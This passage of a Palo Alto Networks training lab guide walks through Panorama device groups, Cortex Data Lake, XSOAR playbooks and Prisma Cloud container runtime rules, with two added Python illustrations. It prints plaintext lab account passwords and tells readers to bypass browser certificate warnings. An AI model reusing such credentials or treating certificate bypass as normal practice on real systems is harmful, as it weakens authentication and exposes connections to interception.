Alto Networks Cortex platform which provides a scalable ecosystem of security applications that
can apply advanced analytics in concert with Palo Alto Networks enforcement points to prevent
the most advanced attacks.

In this activity, we will take a quick look at how to use Panorama to enable Cortex Data Lake on
the Palo Alto Networks ML-Powered Next-Generation Firewall.

To enable the Next-Generation Firewalls to send logs to the Cortex Data Lake, the NGFWs need to be
managed by a Panorama device with the Cortex Data Lake license. The next few activities will show you
the configuration screens and their settings related to the NGFW and Panorama.

Task 1 – Log into Network Security Management: Panorama


Step 1: Click on the Panorama-GUI tab to open a new direct tab in your browser to connect to the
Panorama Web interface. If you don’t see the Panorama-GUI tab, click on the right arrow at the end of the
tabs to scroll to the Panorama GUI tab.

Log in to Panorama with the following Read-Only account:

Username: student

Password: utd246

Step 2: In your Panorama, navigate to the Panorama tab, then click the Licenses node at the bottom
left.

Check that the Premium Support license and the Cortex Data Lake license are valid for this Panorama.

Step 3: Navigate to Panorama > Managed Devices > Summary and check that the Firewall is a
managed device. You will see your NGFW device is managed by Panorama.

The following steps verify that Managed Firewalls inherit the Logging Service license from Panorama.

Step 4: Go to Panorama > Device Deployment > Licenses to check that the Firewall is licensed with
Cortex Data Lake.

Task 2 – Forwarding Logs to Cortex Data Lake with Template and Device Object
We will use Panorama to enable a group of NGFWs to forward logs to Cortex Data Lake (CDL) in this lab.
You have the option to configure CDL using the NGFW GUI but Panorama makes it much easier to apply
the same settings to multiple NGFWs.

In Panorama, ensure the Device Group and Template are set to Cortex_Data_Lake_Device_Group and
Cortex_Data_Lake_Template.

Step 1: Click on Device and select the Setup node. Make sure Cortex_Data_Lake_Template is
selected under Template.

Step 2: Navigate to the Management tab, scroll down to Cortex Data Lake and view the configuration.
Both Enable Logging Service and Enable Enhanced Application Logging are enabled, and the
Region is americas.

Step 3: Navigate to Objects > Log Forwarding and ensure Cortex_Data_Lake_Device_Group is
selected under Device Group.

Step 4: Click on Cortex_Data_Lake_Profile to verify that the Forward Method is set to Panorama/Cortex
Data Lake for the various log types.

Step 5: Go to Policies > Security > Post Rules. Make sure the Device Group is set to
Cortex_Data_Lake_Device_Group.

Step 6: Review that the Example_policy rule has Log Forwarding set to Cortex_Data_Lake_Profile
under Log Setting. The Profile Setting for URL Filtering should be set to URL_Alert_All.

If you commit and push these settings to the firewalls in the Cortex_Data_Lake_Device_Group, all the
firewalls in this device group will send logs to the Cortex Data Lake. Note that you will not be able to commit
changes in this lab.

Task 3 – Manage NGFW policies with Device Groups
Panorama groups the firewalls in your network into logical units called device groups. A device group
enables grouping based on network segmentation, geographic location, organizational function, or any
other common aspect of firewalls that require similar policy configurations. We will take a quick look at the
pre-configured device groups here.

Step 1: Go to Panorama > Device Groups; this is where you can manage all the device groups and their
settings. In the Device / Virtual System column, you can see which firewalls are in each device group.
Note that we have only one firewall here and it is in the Cortex_Data_Lake_Device_Group.

Step 2: Click on the Cortex_Data_Lake_Device_Group to review some of the options in the
device group settings. With the Parent Device Group setting, you can create a device group hierarchy to
share rules and objects across devices in different device groups. Click Cancel to close the
device group window.

By using device groups hierarchically, you can share rules and objects at the top level, and define device
group-specific rules and objects at subsequent levels. This enables you to create a hierarchy of rules that
enforce how firewalls handle traffic. We will not go into the device group hierarchy here, but if you want to
know more about it, please ask your instructor for more details.

Step 3: Click on the Policies tab to go back to the Security Policy window. Note the Device Groups text
on top of the Policies and Objects tabs; this reminds you that their contents are scoped by the device group
selection. You can see that there is one Post Rule in the Cortex_Data_Lake_Device_Group.

Step 4: Now switch to the Cortex-XSOAR-DeviceGroup in the Device Group drop-down and notice that
there is no post rule in this device group. This demonstrates how you manage different policies and
objects using different device groups.

Step 5: Check the Pre Rules in the Cortex-XSOAR-DeviceGroup and the
Cortex_Data_Lake_Device_Group; you should see that there are no Pre Rules in either of them. You can
also look at Objects > Application Groups and see the differences between the two device groups.
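To make the pre-rule / local-rule / post-rule ordering concrete, here is an added example in Python (not workshop or Palo Alto Networks code) that models Shared, parent and child device groups and evaluates a session in the order a Panorama-managed firewall uses: Shared pre-rules, device group pre-rules from the top of the hierarchy down, firewall-local rules, device group post-rules from the firewall's group up, Shared post-rules, then the default rules. The device group names mirror the lab's, but every rule, zone and match criterion is constructed, including the `allow_fortnite` pre-rule that stands in for the one the XSOAR playbook creates later in this workshop.

```python
"""Constructed model of Panorama rule evaluation order (added example, not
Palo Alto Networks code). Rules are evaluated in this order and the first match wins:
  1. Shared pre-rules
  2. Pre-rules of each device group, top of the hierarchy down to the firewall's group
  3. Rules configured locally on the firewall
  4. Post-rules of each device group, firewall's group up to the top
  5. Shared post-rules
  6. Default rules: intrazone-default (allow), interzone-default (deny)
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

ANY = "any"


@dataclass(frozen=True)
class Rule:
    name: str
    action: str                 # "allow" or "deny"
    source_zone: str = ANY
    dest_zone: str = ANY
    application: str = ANY      # App-ID name

    def matches(self, src_zone: str, dst_zone: str, app: str) -> bool:
        wanted = (self.source_zone, self.dest_zone, self.application)
        actual = (src_zone, dst_zone, app)
        return all(w in (ANY, a) for w, a in zip(wanted, actual))


@dataclass
class DeviceGroup:
    name: str
    parent: Optional["DeviceGroup"] = None      # None for the top-level Shared location
    pre_rules: List[Rule] = field(default_factory=list)
    post_rules: List[Rule] = field(default_factory=list)


def effective_rulebase(dg: DeviceGroup, shared: DeviceGroup,
                       local_rules: List[Rule]) -> List[Rule]:
    """Flatten the rules a firewall in `dg` evaluates, in evaluation order."""
    chain: List[DeviceGroup] = []            # dg, its parent, ... up to (not incl.) Shared
    node: Optional[DeviceGroup] = dg
    while node is not None and node is not shared:
        chain.append(node)
        node = node.parent
    ordered = list(shared.pre_rules)
    for group in reversed(chain):            # top of the hierarchy first
        ordered.extend(group.pre_rules)
    ordered.extend(local_rules)              # firewall-local rules sit in the middle
    for group in chain:                      # firewall's own group first, then parents
        ordered.extend(group.post_rules)
    ordered.extend(shared.post_rules)
    return ordered


def evaluate(dg: DeviceGroup, shared: DeviceGroup, local_rules: List[Rule],
             src_zone: str, dst_zone: str, app: str) -> Tuple[str, str]:
    """Return (rule name, action) of the first match, else the applicable default rule."""
    for rule in effective_rulebase(dg, shared, local_rules):
        if rule.matches(src_zone, dst_zone, app):
            return rule.name, rule.action
    if src_zone == dst_zone:
        return "intrazone-default", "allow"
    return "interzone-default", "deny"


# --- constructed scenario; names mirror the workshop's device groups, rules are assumed ---
SHARED = DeviceGroup("Shared")
SHARED.pre_rules.append(Rule("Block_unsanctioned_apps", "deny", application="tor"))  # hypothetical

XSOAR_DG = DeviceGroup("Cortex-XSOAR-DeviceGroup", parent=SHARED)
# Stand-in for the pre-rule the workshop playbook creates (match criteria assumed).
XSOAR_DG.pre_rules.append(Rule("allow_fortnite", "allow", application="fortnite"))

CDL_DG = DeviceGroup("Cortex_Data_Lake_Device_Group", parent=SHARED)
# Stand-in for the workshop's Example_policy post rule (match criteria assumed).
CDL_DG.post_rules.append(Rule("Example_policy", "allow", source_zone="trust", dest_zone="untrust"))

# A rule an administrator might add directly on the firewall (hypothetical).
LOCAL_RULES = [Rule("Local_deny_fortnite", "deny", application="fortnite")]


if __name__ == "__main__":
    for dg in (XSOAR_DG, CDL_DG):
        print(dg.name, "->", evaluate(dg, SHARED, LOCAL_RULES, "trust", "untrust", "fortnite"))
    # Cortex-XSOAR-DeviceGroup -> ('allow_fortnite', 'allow'): the Panorama pre-rule wins
    # Cortex_Data_Lake_Device_Group -> ('Local_deny_fortnite', 'deny'): local beats post-rule
```

The practical point for reviewers: a pre-rule pushed from Panorama cannot be overridden by a rule an administrator adds on the firewall itself, whereas a post-rule can.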

In the next activity, we will show you how to integrate Cortex XSOAR and Panorama using a device group.

End of Activity 4

Activity 5 – Introduction to Cortex XSOAR
Cortex XSOAR is the industry-leading Security Orchestration, Automation & Response (SOAR)
technology that can automate many response actions requiring human review and allow
overloaded security teams to focus on the actions that really require their attention.

Task 1 – Cortex XSOAR Ecosystem

Effective security orchestration is about making different products integrate with each other and
automating tasks across products through workflows, while also allowing for human oversight and
interaction. To achieve that goal, Cortex XSOAR integrates with security and non-security technologies,
based on what our SOC customers need to streamline and automate their incident response end-to-end.

Cortex XSOAR is the industry-leading Security Orchestration, Automation & Response (SOAR)
technology by Palo Alto Networks that will automate up to 95% of all response actions requiring human
review and allow overloaded security teams to focus on the actions that really require their attention.
Cortex XSOAR orchestration enables security teams to ingest alerts across sources and execute
standardized, automatable playbooks for accelerated incident response. Cortex XSOAR playbooks are
complemented by real-time collaboration capabilities that let security teams rapidly iterate to solve
emergent threats.

The Cortex XSOAR ecosystem includes over 900 integrations and content packs from Palo Alto
Networks, our technical partners, and community, available in the Cortex XSOAR Marketplace. In this
task, we will show you how you can easily access many integrations in Cortex XSOAR.

Step 1: Click on the Cortex XSOAR GUI tab to open a browser to the XSOAR lab instance. You are
accessing a private instance, accept the security warning and go to the login page.

Log in with:
Username: student
Password: Xsoar@utd135

Step 2: After successfully logging into the Cortex XSOAR lab instance, you will see the Dashboards of
the XSOAR instance. Since this is a lab instance, it does not have much data in it.

Step 3: Hover your mouse over the black panel on the left-hand side; it will expand and provide more
context on the icons. Click on Marketplace:

Step 4: The Cortex XSOAR Marketplace provides access to the integrations, content packs, playbooks
and more offered by the Cortex XSOAR team and our partners. Feel free to explore the various
integrations that are available. Enter Palo Alto Networks in the search bar to see some of the content
packs for the different Palo Alto Networks products and services that can be integrated with Cortex
XSOAR.

Step 5: You can see the content packs that are currently installed on the XSOAR lab instance by going to
the Installed Content Packs tab. XSOAR marketplace frequently provides updates to the content packs
and you will likely see some new updates available.

Step 6: Look for the PAN-OS content pack under the Content Packs Library using the search bar and
review the Details and Content tabs on the right. You will be able to see the Integrations and
Playbooks that come with this content pack.

Step 7: Search for ipinfo in the search bar under Content Packs Library; you should not find it under
Installed Content Packs, because this pack is not currently installed.

Step 8: Most content packs will require further setup and configuration after they are installed on your XSOAR
server. You can find the configuration under Settings > Integrations > Instances. Select Enabled next
to Show to filter the list down to the content packs that are enabled.

You can click on the gear icon on the right to review the configurations of the content pack. Take
a quick look at the Palo Alto Networks WildFire Reports or any other content pack
configurations. Do not make any changes.

Step 9: Cortex XSOAR enables you to run system commands, integration commands and automations
from an integrated command line interface (CLI). The XSOAR CLI is located at the bottom of the GUI and
is available throughout XSOAR. You should see one at the bottom of the Settings page.

Step 10: We will test a command here. To run a command in the XSOAR CLI, start the command with !
followed by the command. Execute the following command: !ip 8.8.8.8
Step 11: Cortex XSOAR will take you to the Playground page where commands are executed. Click Yes,
execute in playground to execute the command.

Step 12: You should get an error message from DBot, because this command does not exist yet. We will
install the content that will provide the support for this command in the next task.

Task 2 – Install and test a new Integration from XSOAR Marketplace


In this task, you will install a new content pack and see how you can use it in the CLI.

Step 1: Go to Marketplace > Browse and search for the ipinfo content pack in the search bar.

Step 2: Click on ipinfo and install it using the Install button on the right; this is one of the many free
content packs available in XSOAR.

Step 3: After successfully installing the content pack, we will set it up by going to Settings > Integrations
> Servers & Services. Set the Show filter to All and use the search bar to search for the ipinfo
integration. Click Add instance for the IPinfo v2 integration. (Note: Do not use the Deprecated version.)

Step 4: You can review the instance settings and then click Save & exit to complete the setup.

Step 5: After adding the instance, you should see a new ipinfo instance listed. You can click on the
gear icon to open the settings page and run a test to see if the new instance is functional.

Step 6: Issue an ip command to test this new instance. Go to the built-in XSOAR CLI at the bottom and
enter !ip 8.8.8.8 using=, select the ipinfo instance that you have just installed and press Enter to execute
the command. Click Yes, execute it in the playground.

Step 7: Notice that with the same command, you get a different result from a different integration.
You have successfully added a new integration and used it in XSOAR.

Task 3 – Cortex XSOAR Playbook Example

Cortex XSOAR Playbooks are self-contained, fully documented prescriptive procedures that query,
analyze, and act based on the gathered results. Playbooks enable you to organize and document security
monitoring, orchestration, and response activities. There are several out-of-the-box playbooks that cover
common investigation scenarios. You can use these playbooks as-is or customize them according to your
requirements.

A key feature of Playbooks is the ability to structure and automate security responses, which were
previously handled manually. You can reuse Playbook tasks as building blocks for new playbooks, saving
you time and streamlining knowledge retention.

Cortex XSOAR Playbooks are at the heart of the Cortex XSOAR system, and a full treatment of them is outside
the scope of this workshop. We will show you a simple playbook here as a quick demonstration of what a
playbook can do.

Step 1: Go to Playbooks on the left to access all the playbooks that are currently available in your
XSOAR system. There are many playbooks pre-installed from the content packs.

Step 2: We have created a very simple playbook here for this workshop. Click on the
01_utd_allow_fortnite playbook and you will see that there are a few simple tasks in this playbook.

Step 3: Click on the first task Notify Network Team to review this task. This is a manual task and while it
does not provide any automated action, it serves as a good demonstration of how the playbook works
later. Close the task window.

Step 4: Double-click on the Add_fortnite_policy_to_panorama task; this task uses the
panorama-create-rule command. Review the fields under the Inputs tab that define the policy that will
be created in Panorama when this task is executed. Close the task window without making any changes.

Step 5: Before we show you how to execute this playbook, let’s go back to Panorama to see what we
have there before the automation. Go back to the Panorama GUI, then go to Policies > Security > Pre
Rules, select Cortex-XSOAR-DeviceGroup in the Device Group drop down. You should see no
pre-rule in this device group.

Task 4 – Incidents and Playbook


Incidents are events that have been observed at a point in time and saved for analysis. Incidents can be
ingested from third party integrations, created manually through the user interface, or generated through
the REST API. We will create a simple incident to demonstrate the playbook you just reviewed.

Step 1: Go back to the Cortex XSOAR GUI, go to Incidents. Since this is a lab instance, there is no
incident here so let’s create one.

Step 2: Click New Incident to create a new incident.

Step 3: In the new incident window, enter and select the following and click Create New Incident to
create it.

Name: Boss wants to play Fortnite
Owner: student
Type: Network
Severity: Medium (set as High if performance review is coming soon!!)
Playbook: 01_utd_allow_fortnite

Step 4: Scroll down in the Incidents window and click the incident ID for the incident that you just created.
It will open the Incident Info window.

Step 5: In the Incident Info window, you can see that the playbook for this incident is already running
and there is a task waiting for the user to complete.

Step 6: You can click on either the Task Pane or the Work Plan to view the task. The Task Pane is best
suited to the simple tasks we have here, so we use it. Note that the next task has not been executed yet, so
you can check in the Panorama GUI that there is still no pre-rule in the Cortex-XSOAR-DeviceGroup.

Step 7: There are a few options available in the task window, but we will keep it simple by clicking on
Mark Completed to tell XSOAR this task is done and move on to the next task in the playbook.

Step 8: You will see the remaining task in the playbook being executed and be notified when the last task is
done.

Step 9: After the playbook has executed, go back to the Panorama GUI and you should find that a new
firewall rule has been added in the Cortex-XSOAR-DeviceGroup.

Now, the team just needs to push this policy update to the firewalls and your boss should be playing
Fortnite happily in no time.

Task 5 – Other Cortex XSOAR Resources

We have only scratched the surface of Cortex XSOAR here and some of the common XSOAR use cases
include:
● SECOPS Workflow Automation
● Incident Case Management
● Threat Intel Management
● Network Security Automation

To learn more about what Cortex XSOAR can do for you, we invite you to take a quick look at this short
video.

https://www.youtube.com/watch?v=DYJX9KFnJNo&feature=youtu.be

If you would like to give Cortex XSOAR a try in your own environment, you can register for the XSOAR
Community Edition to get a free trial of the full-featured version. Please visit the following site to learn more
about the Cortex XSOAR Community Edition.

https://start.paloaltonetworks.com/sign-up-for-community-edition.html

End of Activity 5

Activity 6 – Protection for Public Cloud with VM-Series and Prisma Cloud
Network protection must be adapted for cloud native environments while still enforcing consistent
policies across hybrid environments. Leveraging a single security tool with consistent control, the
VM-Series virtual firewalls provide comprehensive network visibility and advanced threat
protection across multi-cloud and hybrid cloud environments. The VM-Series virtual firewalls can
be deployed in many public cloud environments such as Microsoft Azure, Amazon Web Services
(AWS), Google Cloud Platform (GCP) and Oracle Cloud, so the same advanced security policies
and control can be applied across different cloud services and managed from the same user
interface.

The move to the cloud has changed all aspects of the application development lifecycle – security
being foremost among them. Security and DevOps teams face a growing number of entities to
secure as the organization adopts cloud native approaches. Ever-changing environments
challenge developers to build and deploy at a frantic pace, while security teams remain
responsible for the protection and compliance of the entire lifecycle. Prisma™ Cloud delivers
complete security across the development lifecycle on any cloud, enabling you to develop cloud
native applications with confidence.

In this activity, we will take a quick look at how the VM-Series for Public Cloud and Prisma Cloud
products offer comprehensive security for your journey to the public cloud.

You have experienced some of the VM-Series ML-Powered Next-Generation Firewall capability in
the previous lab activities. The same VM-Series NGFW can be deployed in various public cloud
services to protect your infrastructures the same way it does in the data center. We will take a
quick look at how VM-Series can be deployed to protect your public cloud infrastructure.

Task 1 – VM-Series ML-Powered Next-Generation Firewall for the Public Cloud
VM-Series can be deployed directly from many public cloud marketplaces. Visit your public cloud provider
marketplace and search for Palo Alto Networks to access all the Palo Alto Networks products available on
the public cloud providers. Here are some examples:

Amazon Web Services (AWS) Marketplace

https://aws.amazon.com/marketplace/search/results?x=0&y=0&searchTerms=Palo+Alto+Networks

Google Cloud Platform (GCP) Marketplace:

https://console.cloud.google.com/marketplace/browse?q=Palo%20Alto%20Networks

Microsoft Azure Marketplace:

https://azuremarketplace.microsoft.com/en-us/marketplace/apps?search=Palo%20Alto%20Networks&page=1

Various licensing models are available for VM-Series in the public cloud deployment. Bring Your Own
License (BYOL) or Enterprise License Agreement (ELA) models are available for customers with current
licenses. Or you can choose between the Bundle 1 or Bundle 2 Pay As You Go (PAYG) license that offers
different subscription bundles.

With a valid public cloud account, you can deploy a VM-Series in your public cloud account using the Pay
As You Go (PAYG) license even if you don’t have an existing license from Palo Alto Networks. Please
note that fees apply, both for the license and for the other public cloud service charges.

Palo Alto Networks offers workshops where you can learn more on how to deploy the VM-Series and
CN-Series in AWS, Azure and GCP. Please discuss with your instructor to learn more about our offerings
for the public clouds.

Task 2 – Manage and Deploy VM-Series in Public Cloud with Panorama Plugins
Panorama offers easy-to-implement and centralized management features for the VM-Series NGFW so
you can implement the same security policy across different public cloud providers. The Panorama
extensible plugin architecture enables support for the various public cloud providers so you can select
what you need. We will take a quick look at the Panorama plugins for the supported public cloud
providers.

Step 1: In the Panorama GUI, go to the Panorama tab and scroll down the left-hand side; you
should see the AWS, Azure and Google Cloud Platform nodes under the Plugins node.

Step 2: Click on the AWS node to open and review the supported features in the plugin.

Step 3: Deployments is a new feature added to the latest AWS plugin, which enables you to orchestrate
VM-Series firewall deployments from Panorama. Click on Add to open up the deployment configuration
window to review some of the options.

Step 4: Review some of the other plugin options that are available in the Azure and Google Cloud
Platform plugins.

Palo Alto Networks also offers CN-Series container next-generation firewalls that enable visibility and
control over Kubernetes environments. With native Kubernetes integration and centralized management
in Panorama through the Kubernetes plugin, you can easily integrate CN-Series firewall provisioning
through the same management platform.

Step 5: Go to the Kubernetes plugin; you can see all the supported Kubernetes types in the Cluster tab
when you add a new cluster.

Step 6: Click on the Plugins node. This is where you can download and update to the latest plugin version
and access the latest features for the respective public cloud providers in Panorama. We hope this gives
you a quick look at how Panorama can help you manage your Palo Alto Networks firewalls across multiple
public cloud providers. With the read-only Panorama account, you will not be able to update or refresh the
plugins list.

Task 3 – Resources for VM-Series in Public Cloud
Step 1: Visit the Palo Alto Networks Live community where you can find a lot of resources in the Getting
Started with VM-Series for Public Cloud page. Select the public cloud service provider of your interest and
you will find many useful tips and help to get you started.

https://live.paloaltonetworks.com/t5/Getting-Started-With-VM-series/ct-p/Getting-Started-Public-Clouds

Step 2: For example, select AWS to visit the AWS Resource Page.

https://live.paloaltonetworks.com/t5/AWS/ct-p/AWS

Step 3: Palo Alto Networks also shares many deployment samples, scripts, SDKs and more through
GitHub. Feel free to explore our GitHub repositories for tools that could help your journey in the public
cloud.

https://github.com/PaloAltoNetworks

Task 4 – Quick Look at Prisma Cloud and Prisma Cloud Compute Edition

Prisma Cloud is a comprehensive cloud-native security platform with the industry’s broadest security and
compliance coverage. It protects cloud native applications, data, network, compute, storage, users, and
higher-level PaaS services across cloud platforms. Prisma Cloud enables Cloud Security Posture
Management (CSPM) and Cloud Workload Protection Platform (CWPP) for comprehensive visibility and
threat detection across your organization’s hybrid, multi-cloud infrastructure. It dynamically discovers
resources as they are deployed and correlates cloud-service-provided data to enable security and
compliance insights into your cloud applications and workloads.

Prisma™ Cloud continuously ingests data from hundreds of cloud service provider APIs and threat
intelligence sources, creating a massive data lake of your public cloud deployment. It applies policy- and
machine learning-based analysis to discover and classify assets, flag compliance and governance
violations, detect suspicious activities, and identify data risk. Interactive reports and investigation
capabilities enable rapid incident investigations. Finally, issues are automatically remediated via API
integration with your favorite tools or directly within the Prisma Cloud console itself.

Prisma Cloud Compute Edition (PCCE) is a self-hosted offering that’s deployed and managed by you. It
includes the Prisma Cloud Compute module only. You can download the Prisma Cloud Compute Edition
software from the Palo Alto Networks Customer Support Portal. Compute Console is delivered as a
container image, so you can run it on any host with a container runtime (e.g. Docker Engine). We will use
the PCCE VM hosted in your lab environment in this and the next activity.

Let's log in to the Prisma Cloud Compute Edition GUI.

Step 1. Click on the PCCE GUI tab to open a new browser tab to the Prisma Cloud Compute Edition GUI.

Step 2. When you see the warning message "Your connection is not private", click Advanced, and then
Proceed to <URL> (unsafe) to bypass the warning message and move on to the login page.

Step 3. Log in to the PCCE console using the following credentials, with Local/LDAP selected in the drop-down:

Username: student
Password: Utd!35

Step 4. Once logged in, you will be placed in Radars, the primary interface for monitoring and
understanding your environment. It is designed to let you visualize and navigate through Prisma
Cloud Compute’s data. Click on any container to view the details on that container. The defender and
the console containers are the key components for Prisma Cloud Compute Edition.

Step 5. Clicking on the shellinabox:0.1 container brings up a detailed view of the status of the container.
You can view the different types of alerts for the container.

Step 6. Click on Vulnerability or Compliance to view the alerts.

Step 7. Click Radars > Hosts, then click the prismacompute host icon to review the host dashboard.
You can view the alerts for the host on which all the containers are running. Note that there is only one
host in this lab. All the containers and the Prisma Cloud Compute Edition console run on the same host.

Step 8. Check the Container models state by navigating to Monitor > Runtime > Container Models.

Step 9. If the state of the shellinabox container is Active, then proceed to the next step.

Note: If the state is Learning, click the three dots in the Actions column and click Manual Relearning
twice (once to start it and once to stop it). That should put the container state back to Active.

Step 10. Go to Monitor > Events > Container audits and review the audit alerts there. Scroll down and
you should see no alerts from the shellinabox container.

In the next task, we will log in to the shellinabox container and demonstrate how PCCE can monitor
container activity.

Task 5 – Monitoring and Controlling Container Processes with Prisma Cloud

In this task, we will use the shellinabox container to demonstrate how Prisma Cloud Compute Edition
detects and blocks processes executed in a container. We will log in to the PCCE-VM to confirm that the
shellinabox container is running and then log in to the shellinabox container to execute some commands
in the container.

Step 1. Click on the PCCE-VM tab to access the PCCE-VM terminal. The PCCE-VM tab should provide
you with SSH access to the PCCE VM.

Step 2. The prompt shows you that you are in the prismacompute VM. Use the docker ps command to
show the containers running in this VM. You should see the shellinabox container running.

Step 3. Then, run a bash shell in the shellinabox container using the script shortcut:

./shellinabox-bash

Note the "./" in front of the command. The change in prompt indicates that you are in the bash shell of
the container.

Step 4. Run the command top in the container. You can see the top command running. To exit out of the
top command, press q or CTRL+C.

Step 5. Now run the following ping commands; the container should allow the processes to run.

ping -c 3 www.google.com

ping -c 3 www.yahoo.com

Step 6. Return to the PCCE GUI and in Monitor > Events > Container Audits, you should see the alerts
generated by the top and ping commands from the previous steps. Review the message and rule of the
alert.

Step 7. Now, we will create a rule to prevent the ping command from running in the shellinabox container.
Go to Monitor > Runtime > Container models.

Step 8. Click on the Action button (3 dots) for the shellinabox image, then click Copy into rule to create
a new rule.

Step 9. In the Create new runtime rule window, keep the rule name, add My new runtime rule in the
Notes. Then go to the Processes tab, add /bin/ping under Allowed - Processes and select Prevent
under Denied & fallback.

Note that the top command is not in the allowed processes list.

Step 10. Click Save to save the new rule. You will be able to find this new rule in Defend > Runtime >
Container policy.

Step 11. Now go back to the PCCE-VM where you are running the bash shell in the shellinabox
container. Run the top and ping commands again. You should see that the top command is not permitted,
while you can still run the ping command because we added it to the allowed processes list.
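To make the rule logic that Steps 4 to 11 exercise concrete, here is an added Python illustration of how a learned container model, an Allowed - Processes list and a Denied & fallback effect combine; it is not Prisma Cloud's own engine, and the image name, binary paths and learned-process set are constructed for the example.

```python
"""Simplified model of a Prisma Cloud Compute container runtime process rule.

Added illustration, not Prisma Cloud's own engine: it mimics the semantics the
lab exercises (a learned container model, an Allowed - Processes list and a
Denied & fallback effect). Image name, paths and learned set are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass, field

ALERT, PREVENT = "alert", "prevent"   # the two Denied & fallback effects used in the lab


@dataclass
class ContainerModel:
    image: str
    state: str           # "learning" or "active"
    learned: set[str]    # binaries observed while the model was learning


@dataclass
class RuntimeRule:
    name: str
    image: str                                      # image the rule applies to
    allowed: set[str] = field(default_factory=set)  # Allowed - Processes
    denied: set[str] = field(default_factory=set)   # explicitly denied processes
    fallback: str = ALERT                           # effect for anything not listed


def copy_into_rule(model: ContainerModel, name: str, fallback: str) -> RuntimeRule:
    """Like 'Copy into rule': seed the allow list from the learned model."""
    return RuntimeRule(name, model.image, allowed=set(model.learned), fallback=fallback)


def evaluate(proc: str, model: ContainerModel, rule: RuntimeRule | None) -> str | None:
    """Return the audit effect for a process launch, or None when it runs silently."""
    if model.state == "learning":
        model.learned.add(proc)          # learning mode observes, never audits
        return None
    if rule is not None and rule.image == model.image:
        if proc in rule.allowed:
            return None                  # explicit allow wins
        if proc in rule.denied:
            return PREVENT
        return rule.fallback             # Denied & fallback decides the rest
    if proc not in model.learned:        # no custom rule: alert on deviations from the model
        return ALERT
    return None


def outcomes(cmds: tuple[str, ...], model: ContainerModel, rule: RuntimeRule | None) -> dict[str, str]:
    """Map each command to its audit effect, or 'allowed' when no audit is written."""
    return {p: evaluate(p, model, rule) or "allowed" for p in cmds}


def lab_sequence() -> dict[str, dict[str, str]]:
    """Replay steps 4-11 of the task and report each command's outcome."""
    model = ContainerModel("shellinabox:0.1", "active", {"/bin/bash", "/bin/ls"})
    cmds = ("/usr/bin/top", "/bin/ping")
    before = outcomes(cmds, model, None)            # steps 4-6: both commands audited
    rule = copy_into_rule(model, "shellinabox:0.1", PREVENT)
    rule.allowed.add("/bin/ping")                   # step 9: allow ping, fallback Prevent
    after = outcomes(cmds, model, rule)             # step 11: top prevented, ping allowed
    return {"before": before, "after": after}


if __name__ == "__main__":
    for phase, result in lab_sequence().items():
        print(phase, result)
```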

We hope this short lab shows you a few simple features of the Prisma Cloud product. We invite you to
take a quick look at a short demo video to learn more about Prisma Cloud.

https://www.youtube.com/watch?v=ZV1vARR4VkY

Palo Alto Networks offers a Cloud Native Security Platform workshop where you can learn more about
Prisma Cloud, which provides Cloud Security Posture Management (CSPM) and Cloud Workload
Protection Platform (CWPP). Please discuss with your instructor to arrange one for your team, or
register for one of our online events here.

End of Activity 6

Activity 7 – Quick Look at Prisma SASE (Secure Access Service Edge)
Digital transformation, cloud adoption, and remote work have eroded physical perimeters, driving
infrastructure and security transformation in the enterprise. Organizations need a scalable way of
securing remote access for every user and branch location. Secure Access Service Edge (SASE)
converges best-of-breed networking and security into a single solution purpose-built for agile,
cloud-enabled organizations. Prisma® SASE is the industry's only complete SASE solution,
converging network security, SD-WAN, and Autonomous Digital Experience Management (ADEM)
in the cloud. Only Prisma SASE uniquely and consistently delivers cloud-delivered security
services to secure all apps used by your hybrid workforce, regardless of whether users are
remote, mobile, or working from a branch office.

In this activity, you will:

● See how Prisma Access provides the foundation for consistent cloud-delivered security.
● Learn about Prisma SD-WAN key architectural benefits.
● See how Autonomous Digital Experience Management (ADEM) can help you gain end-to-end
visibility across your network.

Task 1 – Introduction to Prisma Access

Prisma Access delivers a secure access service edge (SASE) that provides globally distributed
networking and security to all your users and applications. Whether at branch offices or on the go, your
users connect to Prisma Access to safely access cloud and data center applications as well as the
internet.

We invite you to take a quick look at the following short video to learn more about how this
cloud-delivered protection addresses requirements for secure access to applications with global
coverage.

https://www.youtube.com/watch?v=D7s4kA1GRkw

Task 2 – Cloud Management for Prisma Access
Prisma Access Cloud Management is a simple yet powerful cloud-delivered solution that enables
comprehensive security management through a single security rule base, with simplified workflows to
address use cases in threat prevention, URL filtering, application awareness, user identification,
sandboxing, file blocking, and access control. It provides complete visibility into the entire deployment
alongside actionable insights to help improve the end user experience. This crucial simplification of
security management and continuous assessment against Palo Alto Networks-defined best practices allow
you to improve your organization's security posture. We are going to take a quick look at Cloud
Management for Prisma Access in this task.

Step 1. Click on the Prisma Access tab to go to the login page for the Cloud Management UI.

It can take a minute to connect and display the login page.

Step 2. The username, utd-sase@pan-labs.net, should already be filled in. Click Next.

Step 3. The password will fill in automatically. Click Sign In.

Step 4. You should be on the Overview page. If not, click Manage > Service Setup > Overview.

For day-to-day management, you can check in here to:

● Get at-a-glance configuration status
● Restore an earlier configuration version, to recover from a configuration push with unintended
impacts to traffic flow or security
● Identify unused objects and rules and clean up your configuration
● Pinpoint areas where you can make configuration changes that would strengthen your security
posture

Note that you are looking at a demo Prisma Access instance so you may see more error messages and
failed checks than an actual functioning instance.

Step 5. In the Basics widget, you will find some simple onboarding checks to help you with your Prisma
Access setup. Click on the first item, Onboard Mobile Users (GlobalProtect), to review the GlobalProtect
setup for mobile users. Note that Prisma Access was previously known as GlobalProtect Cloud
Services, so you will still see that name in some parts of the GUI.

Step 6. After you have reviewed the mobile user setup, go to Manage > Configuration > Security
Services > Security Policy where you can review the security policies configuration for Prisma
Access.

Step 7. Scroll down and, under Security Policy Rules, click on the name of one of the rules to open the
policy window and review the policy details.

Step 8. The policy window may look different from the PAN-OS security rule, but it has the same
parameters, such as Source / Destination Zones and Addresses, Applications, Services and
Protection Profiles.

If you are familiar with Palo Alto Networks PAN-OS configuration, you will find the Prisma Access
configuration in Cloud Management familiar.

Next, we are going to take a quick look at the Autonomous Digital Experience Management (ADEM) in
Prisma Access.

Task 3 – Autonomous Digital Experience Management (ADEM)

Autonomous Digital Experience Management (ADEM) is natively integrated into Prisma Access. With
ADEM, you can monitor end user experience and get segment-wise insights across the entire
application delivery path. IT teams can determine whether an issue is caused by the user's laptop, poor
WiFi signal strength, poor broadband WAN connectivity, middle mile Internet Service Provider (ISP)
issues, cloud or data center connectivity, or a SaaS provider issue.

Step 1. Navigate to Autonomous DEM > Summary. Change the Time Range to Past 7 Days to see
